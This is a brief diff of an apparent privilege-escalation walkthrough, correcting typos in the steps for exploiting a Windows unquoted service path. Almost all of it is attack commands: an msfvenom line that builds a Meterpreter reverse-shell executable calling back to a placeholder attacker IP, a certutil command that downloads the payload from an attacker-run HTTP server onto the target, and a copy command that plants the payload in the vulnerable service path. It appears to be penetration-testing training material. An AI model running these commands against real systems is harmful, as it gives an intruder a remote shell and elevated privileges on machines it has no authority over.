Skip to content

 msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=[ATTACKER-IP] LPORT=[PORT] -o unquotedpathservice.exe

-2. Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
+2. Host the binary using Python HTTP server and transfer it with certutil:

-certutil -urlcache -f http://[IP-ADRESS]:8000/unquotedpathservice.exe unquotedpathservice.exe
+certutil -urlcache -f http://[IP-ADDRESS]:8000/unquotedpathservice.exe unquotedpathservice.exe

 copy C:\Temp\unquotedpathservice.exe "C:\Program Files\Unquoted Path Service\Common.exe"